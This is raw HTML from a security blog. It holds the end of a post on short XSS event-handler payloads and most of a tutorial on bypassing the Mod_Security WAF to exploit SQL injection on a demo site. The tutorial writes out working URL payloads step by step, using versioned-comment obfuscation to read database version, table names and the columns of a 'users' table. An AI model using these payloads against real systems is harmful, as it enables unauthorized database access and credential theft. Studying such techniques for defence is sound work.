<br />
The problem: To trigger the payload, of course, the user must try to cut the "A". In other words, different from onload that is automatic, this payload must have user interaction.<br />
<br />
Another super short we can use with 18 chars is:<br />
<a/oncut=alert(1)> or <a oncut=alert(1)><br />
<br />
<br />
In this case, some text must preexist on page body after injecting the tag <a> and as same from the previous payload, the user must try to cut any text after <a> tag. In other words, also same as the previous example, this payload must have user interaction.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ctL1Jm36_Bk/W1hG7oSE-zI/AAAAAAAABzA/ZFqfC_NKUr0Rf7oyndBsyRouLd97IuGJwCEwYBhgL/s1600/ScreenHunter_539%2BJul.%2B25%2B11.44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="412" data-original-width="413" height="319" src="https://1.bp.blogspot.com/-ctL1Jm36_Bk/W1hG7oSE-zI/AAAAAAAABzA/ZFqfC_NKUr0Rf7oyndBsyRouLd97IuGJwCEwYBhgL/s320/ScreenHunter_539%2BJul.%2B25%2B11.44.jpg" width="320" /></a></div>
<br />
<br /><br />Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-41297260514280726652016-06-23T01:49:00.000-07:002016-06-23T01:49:19.092-07:00Exploiting SQL Injection by Bypassing WAF (Mod_Security)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<span style="font-family: Times, Times New Roman, serif;">Since years,
SQL Injections have been the most dreadful and frightening of all
vulnerabilities discovered till date. The power of a single quote (') is beyond
comparison. SQL injection attacks were first discovered in 1998, with one of
the first live attacks taking place in 2002 on the fashion retailer Guess and
the rest is History. Billions of Dollars and reputations have been lost. In
spite of implementing multiple forms of fixes, it’s a never ending war between
developers and hackers. If the former comes up with a way to prevent it, the
latter comes up with a way to bypass it. </span></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<span style="font-family: Times, Times New Roman, serif;">The blog focuses on providing in-depth insights into the discussion of the techniques used to bypass
one of such prevention methods. This blog will not help you to learn the
basics of SQL Injection; so I would recommend you to go through OWASP before even thinking about jumping into advanced techniques. This blog is more
focused on bypassing Mod_Security (Web Application Firewall) and eventually exploiting SQL Injection vulnerability. </span></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">The Attack:<o:p></o:p></span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
First and
foremost, we need to find our target website. In this case I am using:</div>
<a href="http://targetsite.com/demo/exams.php?sort=8">http://targetsite.com/demo/exams.php?sort=8</a><div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XMzR4ohPgpY/V2uZdK1_M9I/AAAAAAAAxdc/owuM5Zexer44GrhNLFOaUvkndy6Bz1nYwCLcB/s1600/1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><img border="0" height="289" src="https://2.bp.blogspot.com/-XMzR4ohPgpY/V2uZdK1_M9I/AAAAAAAAxdc/owuM5Zexer44GrhNLFOaUvkndy6Bz1nYwCLcB/s640/1.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: none; mso-border-alt: solid white 1.0pt; mso-border-insideh: .75pt solid white; mso-border-insidev: .75pt solid white; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 160;"><tbody>
</tbody></table>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<span lang="EN-GB"><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_2" o:spid="_x0000_i1025" type="#_x0000_t75"
style='width:537pt;height:261.75pt;visibility:visible'>
<v:imagedata src="file:///C:\Users\Bikram\AppData\Local\Temp\msohtml1\01\clip_image001.png"
o:title=""/>
<o:lock v:ext="edit" aspectratio="f"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks perfect!
Right? Now let's try to insert a single quote at the end of the URL and observe
what happens:</div>
<a href="http://targetsite.com/demo/exams.php?sort=8">http://targetsite.com/demo/exams.php?sort=8</a>'</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://4.bp.blogspot.com/-oZ_9eeUVRTg/V2uZgkkjmZI/AAAAAAAAxeQ/BqaMpGBljHQmFsO6oiNo4pwkghtF7yikwCKgB/s1600/2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="302" src="https://4.bp.blogspot.com/-oZ_9eeUVRTg/V2uZgkkjmZI/AAAAAAAAxeQ/BqaMpGBljHQmFsO6oiNo4pwkghtF7yikwCKgB/s640/2.jpg" width="640" /></a></div>
<div>
<br /><table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: none; mso-border-alt: solid white 1.0pt; mso-border-insideh: .75pt solid white; mso-border-insidev: .75pt solid white; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 160;"><tbody>
</tbody></table>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm!! Different response!</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
The page
appears but no data. So something did happen but still we don’t have a
confirmation whether SQL Injection exists or not. Let's modify our query a bit
to see how the application responds.<br />
<a href="http://targetsite.com/demo/exams.php?sort=8%27%20or%201=1--" style="text-align: start;">http://targetsite.com/demo/exams.php?sort=8' or 1=1--</a><br />
<br />
<div class="separator" style="clear: both; text-align: justify;">
</div>
Normally in a
vulnerable website the above query would return values from the entire table
since the Boolean condition is always true. Let's see how this website
responds:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-_2Dv5XVFy0Q/V2uZgg6UkUI/AAAAAAAAxeQ/TKps1L8RkWoHcYDb121LrPOLNchVloNlQCKgB/s1600/3.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="85" src="https://2.bp.blogspot.com/-_2Dv5XVFy0Q/V2uZgg6UkUI/AAAAAAAAxeQ/TKps1L8RkWoHcYDb121LrPOLNchVloNlQCKgB/s640/3.jpg" width="640" /></a></div>
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<o:p></o:p></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<span lang="EN-GB"><!--[if gte vml 1]><v:shape id="Picture_x0020_9" o:spid="_x0000_i1027"
type="#_x0000_t75" alt="\\UBSPROD.MSAD.UBS.NET\UserData\GUHAB\RF\Desktop\Documents\ExamBoard v2.0.0\WAF Bypass\4.jpg"
style='width:541.5pt;height:102.75pt;visibility:visible'>
<v:imagedata src="file:///C:\Users\Bikram\AppData\Local\Temp\msohtml1\01\clip_image005.png"
o:title=""/>
<o:lock v:ext="edit" aspectratio="f"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">BLOCKED! <o:p></o:p></span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
It seems like
our target website has a WAF implemented to prevent itself from being targeted.
So, if I am not wrong, any attacks directed towards the database will be
blocked by Mod_Security. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Well in some
cases, it is possible to block such attacks if you have the implementation done
correctly with an up-to-date version of WAF being used and regular update of
security patches being rolled out. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
But then again,
aren't we hackers? We don't give up, do we? Let's try to get around it. Sounds
intriguing? Let's play.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
First we need
to make some queries work just to be sure that SQL Injection indeed exists.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Finding the Number of Columns:<o:p></o:p></span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Till now I
would say that we are kinda hacking in the dark. No real MySQL errors which
actually proved the presence of SQL Injection. The only success we had was when
we used a single quote in the above mentioned URL and received a blank page in
response…no rows…no data. This can however mean that we somehow managed to
change the structure of the underlying query and the page might be vulnerable
to SQL Injection. Let's try and get some confirmation. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Finding the
number of columns present in the current database might actually prove its
presence. This can be achieved by using a simple "ORDER BY" clause.</div>
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%202--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 1-- </a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-LguXN-PL65Q/V2uZg1zbgcI/AAAAAAAAxeQ/meqhmcWEeA0liBa7wpbgPIYIna-XcViMACKgB/s1600/4.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="294" src="https://2.bp.blogspot.com/-LguXN-PL65Q/V2uZg1zbgcI/AAAAAAAAxeQ/meqhmcWEeA0liBa7wpbgPIYIna-XcViMACKgB/s640/4.jpg" width="640" /></a></div>
<div>
<br /><table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: none; mso-border-alt: solid white 1.0pt; mso-border-insideh: .75pt solid white; mso-border-insidev: .75pt solid white; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 160;"><tbody>
</tbody></table>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
No Error! Expected Response!
Cool…there's Hope after all….</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let's proceed
further…</div>
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%202--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 2-- </a> No Error<br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%203--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 3--</a> No Error <br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%204--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 4--</a> No Error <br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%205--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 5--</a> No Error <br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%206--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 6--</a> No Error <br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20ORDER%20BY%207--">http://targetsite.com/demo/exams.php?sort=8 ORDER BY 7--</a> No Error but a Blank Page<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-w2PhcJ8PV8M/V2uZg4L99II/AAAAAAAAxeQ/xAtGDaMdcwsT2gBByylDtjBnLOqg716bgCKgB/s1600/5.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="302" src="https://4.bp.blogspot.com/-w2PhcJ8PV8M/V2uZg4L99II/AAAAAAAAxeQ/xAtGDaMdcwsT2gBByylDtjBnLOqg716bgCKgB/s640/5.jpg" width="640" /></a></div>
<br />
<table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: none; mso-border-alt: solid white 1.0pt; mso-border-insideh: .75pt solid white; mso-border-insidev: .75pt solid white; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 160;"><tbody>
</tbody></table>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
As seen above, <b><i>ORDER
BY 7--</i></b> query generated a different response thereby proving the
existence of 6 columns in the current database. We were lucky though since the
WAF did not block the '<b>ORDER</b>'
keyword. We need that sometimes!</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
However, since
now we know the number of columns in use; let’s see which columns get
displayed in the response.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
The query would
look like:<br />
<a href="http://targetsite.com/demo/exams.php?sort=8%20UNION%20Select%201,2,3,4,5,6--" style="text-align: start;"> http://targetsite.com/demo/exams.php?sort=8 UNION Select 1,2,3,4,5,6--</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-pzbfwNXWIjo/V2uZg6NQJTI/AAAAAAAAxeQ/rhFc3ulFONIwYba6moyhsdM4ikRKYxygwCKgB/s1600/6.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="84" src="https://4.bp.blogspot.com/-pzbfwNXWIjo/V2uZg6NQJTI/AAAAAAAAxeQ/rhFc3ulFONIwYba6moyhsdM4ikRKYxygwCKgB/s640/6.jpg" width="640" /></a></div>
<br /></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: none; mso-border-alt: solid white 1.0pt; mso-border-insideh: .75pt solid white; mso-border-insidev: .75pt solid white; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 160;"><tbody>
</tbody></table>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br />
<br />
<br />
<br />
OOPS! Mod_Security again!</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
So I guess the
filter has been set on 'UNION' and 'SELECT' keywords. So now it's time to
actually bypass the WAF (since we've had enough of it) by modifying the query
and force the backend database to exfiltrate data as we desire.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Bypassing WAF:<o:p></o:p></span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let's try the modified query below:</div>
<span style="color: white; font-family: Calibri; line-height: 115%;"><a href="http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6--+">http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6--+</a></span></div>
<div>
<span style="color: white; font-family: Calibri;"><span style="font-size: 13.3333px; line-height: 15.3333px;"><b><br /></b></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-nU1Qmpm4bhs/V2uZg-ZJdOI/AAAAAAAAxeQ/x27lMdzM3AUoC8WGmjiay0inCOAzm15VQCKgB/s1600/7.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://2.bp.blogspot.com/-nU1Qmpm4bhs/V2uZg-ZJdOI/AAAAAAAAxeQ/x27lMdzM3AUoC8WGmjiay0inCOAzm15VQCKgB/s640/7.jpg" width="640" /></a></div>
<div>
<span style="color: white; font-family: Calibri;"><span style="font-size: 13.3333px; line-height: 15.3333px;"><b><br /></b></span></span><div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
It seems like
the 3rd, 4th and 6th columns are being displayed. Now we can use SQL Injection
to extract data and display them on the above displayed columns</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let's extract
our first GOLDEN PRIZED data by finding out the MySQL version and the current
database user.<br />
<span style="text-align: start;"><span style="color: white; font-family: Calibri; line-height: 15.3333px;"><a href="http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,%20current_user(),@@version,5,6--+">http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2, current_user(),@@version,5,6--+</a></span></span><br />
<b style="text-align: start;"><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-FxEnHPULbSA/V2uZhPOfgqI/AAAAAAAAxeQ/6ESsxHQ6SO4kviLrccsIZrvsR6gnVHyiwCKgB/s1600/8.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="290" src="https://4.bp.blogspot.com/-FxEnHPULbSA/V2uZhPOfgqI/AAAAAAAAxeQ/6ESsxHQ6SO4kviLrccsIZrvsR6gnVHyiwCKgB/s640/8.jpg" width="640" /></a></div>
<b style="text-align: start;"><br /></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Extracting Data from Database:</span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<span lang="EN-GB"><!--[if gte vml 1]><v:shape id="Picture_x0020_15" o:spid="_x0000_i1032"
type="#_x0000_t75" alt="\\UBSPROD.MSAD.UBS.NET\UserData\GUHAB\RF\Desktop\Documents\ExamBoard v2.0.0\WAF Bypass\9.jpg"
style='width:545.25pt;height:266.25pt;visibility:visible'>
<v:imagedata src="file:///C:\Users\Bikram\AppData\Local\Temp\msohtml1\01\clip_image015.png"
o:title=""/>
<o:lock v:ext="edit" aspectratio="f"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Since we know
it’s a MYSQL database, we also know that there are some globally defined
database tables, columns and schema. The names and hierarchies are as follows:</div>
<div class="ListParagraphCxSpFirst" style="margin-top: 12.0pt; mso-add-space: auto; mso-list: l3 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]--><b><span style="color: red;">information_schema</span></b> - name of the meta-database in
MYSQL which has the following table</div>
<div class="ListParagraphCxSpMiddle" style="margin-bottom: 10.0pt; margin-left: 54.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l1 level1 lfo2; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø </span><b><span style="color: #1f497d;">columns</span></b><span style="color: #1f497d;"> </span>-
is the table name in the information_schema which in turn has the following columns inside</div>
<div class="ListParagraphCxSpMiddle" style="margin-bottom: 10.0pt; margin-left: 90.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">ü<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]--><span style="color: #00b050;">table_name </span>-
all tables in all databases</div>
<div class="ListParagraphCxSpMiddle" style="margin-bottom: 10.0pt; margin-left: 90.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">ü<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]--><span style="color: #00b050;">column_name </span>-
all columns in all the tables of all the databases</div>
<div class="ListParagraphCxSpLast" style="margin-bottom: 10.0pt; margin-left: 90.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">ü<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]--><span style="color: #00b050;">table_schema</span>
- all databases in server</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Now let’s use
this to get some data.</div>
<div class="ListParagraph" style="margin-bottom: 10.0pt; margin-left: 18.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l2 level1 lfo4; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: Calibri;">Step 1.<span style="font-size: 7pt; font-stretch: normal; font-weight: normal; line-height: normal;"> </span></span></b><!--[endif]--><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Extracting Tables:<o:p></o:p></span></b><br />
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<span style="text-align: start; text-indent: 0px;"><span style="color: white; font-family: Calibri; line-height: 15.3333px;"><a href="http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/*!50000gROup_cONcat(table_name,0x0a)%20*/+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+"> http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/*!50000gROup_cONcat(table_name,0x0a) */+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA */like+database()--+</a></span></span><br />
<b style="text-align: start; text-indent: 0px;"><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-us-lkt9mE8Q/V2uZhNu_rOI/AAAAAAAAxeQ/dn-SfAADVaEPNKg19dD-Ymbxkx1xqaSFgCKgB/s1600/9.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="364" src="https://3.bp.blogspot.com/-us-lkt9mE8Q/V2uZhNu_rOI/AAAAAAAAxeQ/dn-SfAADVaEPNKg19dD-Ymbxkx1xqaSFgCKgB/s640/9.jpg" width="640" /></a></div>
<b style="text-align: start; text-indent: 0px;"><br /></b></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: none; mso-border-alt: solid white 1.0pt; mso-border-insideh: .75pt solid white; mso-border-insidev: .75pt solid white; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 160;"><tbody>
</tbody></table>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<span lang="EN-GB"><!--[if gte vml 1]><v:shape id="Picture_x0020_16" o:spid="_x0000_i1033"
type="#_x0000_t75" alt="C:\Users\guhab\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\6.jpg"
style='width:547.5pt;height:327pt;visibility:visible'>
<v:imagedata src="file:///C:\Users\Bikram\AppData\Local\Temp\msohtml1\01\clip_image017.png"
o:title=""/>
<o:lock v:ext="edit" aspectratio="f"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><o:p></o:p></span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Anything
interesting? '<b>users</b>' table seems to
be interesting!</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let's query it
further to see what kind of columns it has.</div>
<div class="ListParagraph" style="margin-bottom: 10.0pt; margin-left: 18.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l2 level1 lfo4; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: Calibri;">Step 2.<span style="font-size: 7pt; font-stretch: normal; font-weight: normal; line-height: normal;"> </span></span></b><!--[endif]--><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Extracting Columns from 'users' Table<o:p></o:p></span></b><br />
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<span style="text-align: start; text-indent: 0px;"><span style="color: white; font-family: Calibri; line-height: 15.3333px;"><a href="http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/*%20!50000gROup_cONcat(column_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.columns+/%20*!50000wHEre*/+/*!50000taBLe_name*/=CHAR(117,%20115,%20101,%20114,%20115)--+"> http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/* !50000gROup_cONcat(column_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.columns+/ *!50000wHEre*/+/*!50000taBLe_name*/=CHAR(117,%20115,%20101,%20114,%20115)--+</a></span></span><br />
<b style="text-align: start; text-indent: 0px;"><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-eEHnlR8wsNA/V2uZgod_7mI/AAAAAAAAxeQ/SGJ36Kji6SsGYJDO2sY2RcGS7NDyDr4IwCKgB/s1600/10.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="364" src="https://2.bp.blogspot.com/-eEHnlR8wsNA/V2uZgod_7mI/AAAAAAAAxeQ/SGJ36Kji6SsGYJDO2sY2RcGS7NDyDr4IwCKgB/s640/10.jpg" width="640" /></a></div>
<b style="text-align: start; text-indent: 0px;"><br /></b></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: none; mso-border-alt: solid white 1.0pt; mso-border-insideh: .75pt solid white; mso-border-insidev: .75pt solid white; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 160;"><tbody>
</tbody></table>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<span lang="EN-GB"><!--[if gte vml 1]><v:shape id="Picture_x0020_17" o:spid="_x0000_i1034"
type="#_x0000_t75" alt="C:\Users\guhab\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\7.jpg"
style='width:547.5pt;height:326.25pt;visibility:visible'>
<v:imagedata src="file:///C:\Users\Bikram\AppData\Local\Temp\msohtml1\01\clip_image019.png"
o:title=""/>
<o:lock v:ext="edit" aspectratio="f"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span></div>
